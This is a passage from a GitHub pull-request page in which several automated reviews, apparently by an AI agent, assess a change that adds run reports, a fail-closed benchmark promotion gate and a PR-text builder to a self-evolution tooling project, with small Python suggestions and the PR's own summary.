baseline.path, optimized.path, and diff.path are recorded as absolute filesystem paths. These will be useless (or misleading) when the report JSON is moved to another machine or shared with a reviewer. Consider storing paths relative to report_dir instead.
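A small sketch of storing report-relative paths, assuming a hypothetical helper named report_relative; the real field layout in run_report.py may differ.

```python
import os
from pathlib import Path


def report_relative(path: Path, report_dir: Path) -> str:
    """Return `path` relative to `report_dir`, using forward slashes."""
    # os.path.relpath can climb out of report_dir ("../.."), unlike
    # Path.relative_to, which raises when `path` is not inside it.
    rel = os.path.relpath(Path(path).resolve(), Path(report_dir).resolve())
    return Path(rel).as_posix()
```

On Windows, os.path.relpath raises ValueError when the two paths sit on different drives, so a caller there may want to fall back to the absolute path.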
SUGGESTIONS
5. EvalExample.to_dict() silently drops falsy metadata
The metadata dict update uses if v. This means message_role="" would be omitted, but it would also silently drop legitimate falsy values such as an integer timestamp=0 or False. (Non-empty strings such as timestamp="0" or project="/" are truthy and survive.) Using if v is not None (or explicitly listing the optional fields) is more defensive.
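The difference between the two filters can be sketched as follows. EvalExampleSketch and its fields are stand-ins chosen for illustration; the real EvalExample may carry different fields.

```python
from dataclasses import dataclass
from typing import Any, Dict, Optional


@dataclass
class EvalExampleSketch:
    """Hypothetical stand-in for EvalExample with three optional metadata fields."""

    task_input: str
    timestamp: Optional[Any] = None
    project: Optional[str] = None
    message_role: Optional[str] = None

    def to_dict(self) -> Dict[str, Any]:
        optional = {
            "timestamp": self.timestamp,
            "project": self.project,
            "message_role": self.message_role,
        }
        data: Dict[str, Any] = {"task_input": self.task_input}
        # Drop only unset fields; falsy-but-real values such as 0 or "" survive.
        data.update({k: v for k, v in optional.items() if v is not None})
        return data
```

Note that this keeps message_role="" as well; if empty strings should still be dropped, listing that rule explicitly is clearer than relying on truthiness.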
6. Deduplication in build_dataset_from_external is O(n) string hashing on task_input
The dedup loop uses the full task_input string as a dict key. For long inputs (up to 2000 chars) this works correctly but may be worth a brief comment explaining why exact-string dedup is preferred over fuzzy dedup here.
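For reference, exact-string dedup of this kind is typically a single pass with a set. The sketch below assumes examples are plain dicts with a task_input key; the helper name is hypothetical.

```python
from typing import Dict, Iterable, List


def dedupe_by_task_input(examples: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Keep the first example for each exact task_input, preserving order."""
    seen = set()
    unique: List[Dict[str, str]] = []
    for example in examples:
        key = example["task_input"]
        if key in seen:
            continue  # exact duplicate of an earlier input
        seen.add(key)
        unique.append(example)
    return unique
```

Exact matching is deterministic and cannot merge two genuinely different prompts, which is the kind of rationale the suggested comment could record.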
7. pr_builder.py hard-codes python -m pytest tests/ -q in the PR body
The test plan command in build_pr_text is always python -m pytest tests/ -q, regardless of the project structure. Consider reading this from the report or making it configurable, so downstream forks with different test runners don't get a misleading test plan.
8. _constraint_to_dict in run_report.py has a fragile fallback
dict(result) as a fallback for non-dataclass ConstraintResult objects will raise TypeError if the object is not dict-constructible. A safer fallback is vars(result) or a check for __dict__.
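A hedged sketch of a more explicit fallback chain, using only the public dataclasses API. The function name mirrors _constraint_to_dict but the body is illustrative, not the PR's code.

```python
import dataclasses
from typing import Any, Dict


def constraint_to_dict(result: Any) -> Dict[str, Any]:
    """Serialize a constraint result, failing with a clear message if impossible."""
    # is_dataclass() is also True for dataclass *classes*; asdict() needs an instance.
    if dataclasses.is_dataclass(result) and not isinstance(result, type):
        return dataclasses.asdict(result)
    if isinstance(result, dict):
        return dict(result)
    if hasattr(result, "__dict__"):
        return dict(vars(result))
    raise TypeError(f"cannot serialize constraint result of type {type(result).__name__}")
```

vars() on its own still raises TypeError for objects without __dict__, so the explicit hasattr check plus a descriptive error is what makes the fallback safer.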
9. benchmark_gate.py CLI does not expose --require-constraints flag
The evaluate_report() function accepts require_constraints: bool = True but the CLI does not expose a --no-require-constraints flag. This means the flag can only be used programmatically. If the intent is that constraint-checking is always mandatory from the CLI (belt-and-suspenders), this is fine — but it should be documented.
LOOKS GOOD
- Fail-closed semantics are consistent throughout: missing required fields, parse errors, and command timeouts all produce passed=False. This is the right default for a promotion gate.
- shlex.split + shell=False prevents shell injection from benchmark commands. The empty-argv guard (if not argv) is also present.
- Secret patterns in _contains_secret cover the most common credential formats including AWS, Anthropic, OpenAI, GitHub, Slack, and Notion tokens. The re.IGNORECASE flag is appropriate.
- _message() canonical schema factory is a clean improvement over the inline dicts it replaces: single definition, all callers forced to provide extraction_reason.
- describe_source_availability distinguishes missing path from empty source. This is an important UX improvement that the tests explicitly verify.
- write_run_report is idempotent-safe: report_dir.mkdir(parents=True, exist_ok=True) handles pre-existing directories.
- SHA-256 hashing is streamed in 1 MiB chunks, which is correct for large files.
- Test coverage is comprehensive: roundtrip serialization, canonical metadata emission, dry-run CLI output, gate pass/fail/timeout, PR body determinism, and git non-mutation verification.
- prepare_pr is correctly guarded behind a run_benchmark_gate pass: the gate failure path sets prepare_pr = False, preventing automated PR creation on regressed evolution runs.
- --write-report/--no-write-report default is True. This is the right default; users who want to opt out can pass --no-write-report but the common path produces auditable artifacts.
Decision: COMMENT (PR is already merged; findings are for post-merge tracking)
The PR is solid. Items 1–4 are worth addressing in a follow-up; items 5–9 are minor style/robustness suggestions.
Automated Review Summary: PR #55 (feat: add ingestion reports and promotion gates)
Reviewed: 8 files | +615 / -46 lines | 2 new test files with 8 test cases
Result: APPROVE with follow-up suggestions
No blockers found. The implementation is well-structured with correct security posture (fail-closed gates,
Post-merge action items (tracked in the full review above):
Full structured review: #55 (review) |
jarrettj
left a comment
Hermes Agent Review — PR #55
Verdict: 💬 Comment (non-blocking — two warnings, one coverage gap)
Checked out locally as pr-55. All 11 new tests pass. Security posture is clean.
✅ Looks Good
- Fail-closed gate: benchmark_gate.py returns GateResult(False, ...) on any missing required field, unreadable report, or non-zero benchmark exit, which is exactly right.
- Non-mutating defaults: pr_builder.py prints by default; network mutation requires explicit --push/--open-pr.
- shlex.split() + shell=False: benchmark subprocess path is safe against injection.
- Secret filtering preserved in all three extraction paths after the _message() refactor.
- schema_version: 1 in report JSON is good forward-compat hygiene.
- Canonical _message() helper eliminates 6 scattered ad-hoc dicts, guaranteeing consistent schema.
⚠️ Warnings / 💡 Suggestions
See inline comments:
- external_importers.py:690 - extract_messages() called without limit in dry-run availability check
- run_report.py:26 - hasattr(__dataclass_fields__) vs dataclasses.is_dataclass()
- test_issue54_promotion.py - dedup loop in build_dataset_from_external has no test coverage
| statuses.append(SourceAvailability(source, str(path), False, "missing_path", 0)) | ||
| continue | ||
| try: | ||
| candidate_count = len(importer_cls.extract_messages()) |
extract_messages() is called without a limit here. For a Copilot session directory with thousands of events, this availability check during --dry-run could be noticeably slow. Consider importer_cls.extract_messages(limit=1) if you only need to confirm the path is readable and parseable — or document the trade-off in the docstring. It's only the dry-run path, so not a hot path, but it can surprise users on large session histories.
|
|
||
|
|
||
| def _constraint_to_dict(result: ConstraintResult) -> dict: | ||
| if hasattr(result, "__dataclass_fields__"): |
💡 Suggestion: hasattr(result, '__dataclass_fields__') relies on an undocumented attribute rather than the public dataclasses API. Prefer import dataclasses; dataclasses.is_dataclass(result), which is the documented way to test this. Both checks treat inheritance the same way (e.g. a non-dataclass subclass of a dataclass still passes is_dataclass), so the gain is readability and API stability rather than different behaviour. Note that is_dataclass also returns True for dataclass classes, not only instances.
| result = CliRunner().invoke(main, ["--report", str(report_path), "--dry-run"]) | ||
| assert result.exit_code == 0 | ||
| assert "Improve demo via self-evolution" in result.output | ||
| assert calls == [] |
💡 Coverage gap: The dedup loop added in build_dataset_from_external (lines 471–477 of external_importers.py) has no test. A small fixture with two messages sharing the same task_input fed through filter_and_score — asserting len(examples) == 1 — would cover it with minimal effort. Not blocking, but easy to add.
jarrettj
left a comment
Hermes Agent Review — PR #55: ingestion reports and promotion gates
Checked out locally and read all 8 changed files. Solid slice — the fail-closed gate design is correct, the secret filtering is consistent, and test coverage is thorough. Two warnings worth tracking before a future re-open; nothing blocking.
✅ Looks Good
- Fail-closed gate throughout: missing fields, unreadable report, timeout, non-zero exit all produce passed=False. Correct default.
- shlex.split() + shell=False for benchmark commands: no injection surface.
- Secret filtering applied consistently before any message is stored, across all three importers.
- _importer_registry() refactor eliminates the triplicated dict literal cleanly.
- SourceAvailability dataclass gives a clean, typed boundary for dry-run reporting; it distinguishes missing path from empty-but-reachable source as required by #54.
- Dedup by exact task_input match after relevance filtering is simple and safe.
- pr_builder.py is local-first by default: remote mutation is fully opt-in behind flags.
- Test coverage: happy path, CLI exit codes, timeout, gate failure, PR body determinism all tested.
⚠️ Warnings
1. reports/runs/ not in .gitignore
Every evolution run writes timestamped .json + .diff artifacts under reports/runs/ (the write_run_report default). That directory is absent from .gitignore, so run artifacts will surface in git status and risk accidental commits. The PR description calls these local artifacts — they should be gitignored consistently with datasets/**/*.jsonl and snapshots/.
2. --run-benchmark-gate in evolve_skill.py always uses hardcoded defaults
When --run-benchmark-gate is passed to evolve_skill.py, the call is evaluate_report(report_path) with no configuration — min_holdout_delta=0.0, max_artifact_growth=0.5, no benchmark commands, default timeout. There is no way to pass gate thresholds through the evolve_skill CLI; callers who want real thresholds must invoke benchmark_gate.py separately. The flag works but is less useful than it appears. Consider either exposing the key thresholds as --gate-min-holdout-delta options, or documenting that the integrated gate uses conservative defaults only.
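To make the defaults concrete, here is a rough sketch of a threshold check using the two values quoted above (min_holdout_delta=0.0, max_artifact_growth=0.5). The report keys holdout_delta and artifact_growth, the GateThresholds class, and check_thresholds are all hypothetical; the actual report schema and evaluate_report() internals are not shown in this thread.

```python
from dataclasses import dataclass
from typing import Any, List, Mapping, Tuple


@dataclass(frozen=True)
class GateThresholds:
    min_holdout_delta: float = 0.0
    max_artifact_growth: float = 0.5


def _is_number(value: Any) -> bool:
    # bool is a subclass of int, so exclude it explicitly.
    return isinstance(value, (int, float)) and not isinstance(value, bool)


def check_thresholds(
    report: Mapping[str, Any],
    thresholds: GateThresholds = GateThresholds(),
) -> Tuple[bool, List[str]]:
    """Fail closed: a missing or non-numeric field counts as a failure."""
    failures: List[str] = []
    delta = report.get("holdout_delta")      # hypothetical field name
    growth = report.get("artifact_growth")   # hypothetical field name
    if not _is_number(delta):
        failures.append("holdout_delta missing or non-numeric")
    elif delta < thresholds.min_holdout_delta:
        failures.append(f"holdout_delta {delta} below {thresholds.min_holdout_delta}")
    if not _is_number(growth):
        failures.append("artifact_growth missing or non-numeric")
    elif growth > thresholds.max_artifact_growth:
        failures.append(f"artifact_growth {growth} above {thresholds.max_artifact_growth}")
    return not failures, failures
```

Passing a thresholds object through from the evolve_skill CLI would be one way to let callers tighten the gate without invoking benchmark_gate.py separately.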
💡 Suggestions
describe_source_availability: clarify available=True, candidate_count=0 semantics
When a path exists but yields zero messages, the function returns available=True, candidate_count=0. This is the correct design (it distinguishes missing path from empty source), but a downstream consumer seeing that combination may wonder why no data was produced. A short docstring note — "available=True means the path is reachable; candidate_count=0 means no extractable messages were found" — would prevent confusion without changing the API.
Reviewed by Hermes Agent — branch pr-55 checked out locally, full diff read, security scan clean.
| console.print(f" Run report: {report_path}") | ||
|
|
||
| if run_benchmark_gate: | ||
| gate_result = evaluate_report(report_path) |
evaluate_report(report_path) is called with no gate configuration — min_holdout_delta, max_artifact_growth, and benchmark_commands all use their library defaults (0.0, 0.5, none). The --run-benchmark-gate flag works but provides no way to tighten the thresholds from the evolve_skill CLI. Consider exposing --gate-min-holdout-delta etc., or document that this integrated call always uses conservative defaults.
|
📁 Follow-up note: |
|
🔧 Inline suggestion for gate_result = evaluate_report(report_path)
Consider either:
|
jarrettj
left a comment
Hermes Agent Review — PR #55: feat: add ingestion reports and promotion gates
Verdict: 💬 Comment (non-blocking) — clean implementation with good safety properties; two warnings and two suggestions below.
Tests: All 11 new tests pass locally (11 warnings are DSPy deprecation notices, not from this PR).
✅ Looks Good
- Fail-closed design in benchmark_gate.py: missing required fields always fail, never silently pass.
- shlex.split() + shell=False for benchmark commands: correct subprocess hygiene, no injection surface.
- _importer_registry() DRYs up the previously duplicated three-importer dict across build_dataset_from_external and the dry-run path.
- Non-mutative defaults throughout: pr_builder.py prints to stdout unless --branch/--push/--open-pr are explicitly passed.
- SourceAvailability.available correctly means reachable, not non-empty; the candidate_count carries the emptiness signal separately. Right semantics.
- Dedup pass in build_dataset_from_external() is a good defensive addition (task-input keyed set, O(n)).
- Sidecar .diff alongside the .json report is a nice human-readable artifact.
⚠️ Warnings
pr_builder.py:595 — git checkout -B silently resets an existing branch
-B creates-or-resets. If a caller accidentally supplies the name of an existing branch that already has commits, those commits are silently discarded. Safer to use -b (which fails if the branch exists) and let the caller handle the conflict, or at minimum document the clobber behaviour.
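The safer default can be sketched as an opt-in flag. The helper names below are hypothetical and are not the ones used in pr_builder.py.

```python
import subprocess
from typing import List


def checkout_argv(branch: str, allow_reset: bool = False) -> List[str]:
    """Build the git command; -b fails if the branch exists, -B resets it."""
    flag = "-B" if allow_reset else "-b"
    return ["git", "checkout", flag, branch]


def create_branch(branch: str, allow_reset: bool = False) -> None:
    # check=True turns git's "branch already exists" error into CalledProcessError,
    # so the caller decides how to handle the conflict.
    subprocess.run(checkout_argv(branch, allow_reset), check=True)
```

Keeping the reset behaviour behind an explicit argument makes the clobbering case a deliberate choice rather than a side effect of a reused name.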
run_report.py — each artifact file is read twice
_sha256(path) reads in binary; the diff generation reads in text. For large artifacts those are two full traversals. Precomputing both in a single pass (or storing the text read for the diff) would halve the I/O — low priority now but worth noting before artifacts grow.
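A minimal single-read sketch, assuming the artifact is UTF-8 text and small enough to hold in memory; read_once is a hypothetical helper, not part of run_report.py.

```python
import hashlib
from pathlib import Path
from typing import Tuple


def read_once(path: Path) -> Tuple[str, int, str]:
    """Return (sha256 hex digest, size in bytes, decoded text) from one read."""
    raw = Path(path).read_bytes()
    digest = hashlib.sha256(raw).hexdigest()
    # errors="replace" keeps diff generation from failing on stray bytes.
    text = raw.decode("utf-8", errors="replace")
    return digest, len(raw), text
```

This trades the streamed 1 MiB chunking for a full in-memory read, which is only reasonable because diff generation needs the whole text anyway.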
💡 Suggestions
pr_builder.py:527 — build_pr_text() has no programmatic error guard
The Click CLI enforces exists=True so the CLI entry point is safe. But build_pr_text() is also called directly from evolve_skill.py. A bare json.loads(Path(report_path).read_text()) will raise FileNotFoundError or json.JSONDecodeError with no context for the caller. A try/except that re-raises with the path in the message would help debugging.
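The suggested guard might look like the sketch below. ReportLoadError and load_report are hypothetical names introduced for illustration.

```python
import json
from pathlib import Path
from typing import Any, Dict, Union


class ReportLoadError(RuntimeError):
    """Hypothetical error type that always carries the report path."""


def load_report(report_path: Union[str, Path]) -> Dict[str, Any]:
    path = Path(report_path)
    try:
        data = json.loads(path.read_text(encoding="utf-8"))
    except FileNotFoundError as exc:
        raise ReportLoadError(f"run report not found: {path}") from exc
    except json.JSONDecodeError as exc:
        raise ReportLoadError(f"run report is not valid JSON: {path} ({exc})") from exc
    if not isinstance(data, dict):
        raise ReportLoadError(f"run report must be a JSON object: {path}")
    return data
```

Chaining with "from exc" preserves the original traceback while giving programmatic callers a single exception type to catch.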
test_issue54_promotion.py — two paths not covered
- write_run_report(cost_estimate=...) is never exercised; the cost gate branch in benchmark_gate.py IS tested but the cost field isn't written by the test fixture, so the cost_estimate serialization path in run_report.py has no coverage.
- pr_builder.py --branch flag: the _run_git call path is tested via monkeypatch in the dry-run test, but the branch-creation + push + open-pr path is never invoked even with mocks.
Reviewed by Hermes Agent — branch checked out at pr-55, tests run locally
| from pathlib import Path | ||
|
|
||
| import click | ||
|
|
git checkout -B silently resets an existing branch rather than failing. If a caller accidentally reuses an existing branch name, those commits are discarded without error. Consider git checkout -b (fail-if-exists) or document the clobber behaviour explicitly.
Code Review Summary
Verdict: 💬 Comment (non-blocking)
|
Code Review Summary — feat: add ingestion reports and promotion gates (PR #55)
What this PR does
Introduces an end-to-end auditable promotion pipeline for self-evolution runs:
Verdict: COMMENT (no blocking issues, several improvements worth addressing)
🔴 Critical
None.
|
Hermes Agent Review (PR #55): feat: add ingestion reports and promotion gates
Checked out locally as
|
Summary
Implements the first auditable promotion slice requested in #54:
- Run reports under reports/runs/ with hashes, sizes, split/source counts, constraints, holdout deltas, and sidecar diffs
- benchmark_gate.py with fail-closed required-field checks, thresholds, optional benchmark commands, per-command timeouts, and structured JSON output
- pr_builder.py for deterministic PR title/body generation with no remote mutation by default
- evolve_skill.py to optionally write reports, run the gate, and prepare a local PR body artifact
Safety / promotion behavior
- --dry-run remains non-mutative.
- pr_builder.py only mutates git/remotes behind explicit branch/push/open flags.
- Benchmark commands are parsed with shlex, executed without shell=True, and bounded by --benchmark-timeout-seconds.
Test Plan
- pytest tests/core/test_issue54_ingestion.py tests/core/test_issue54_promotion.py -q
- pytest -q
Result: 150 passed, 11 warnings (DSPy deprecation warnings only).
Closes #54